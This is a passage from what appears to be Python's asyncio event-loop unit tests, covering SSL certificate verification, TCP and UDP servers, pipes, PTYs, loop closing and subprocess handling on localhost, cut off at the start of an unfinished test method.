test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(
self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client))
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
# Issue #20495: The test hangs on FreeBSD 7.2 but pass on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.5)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
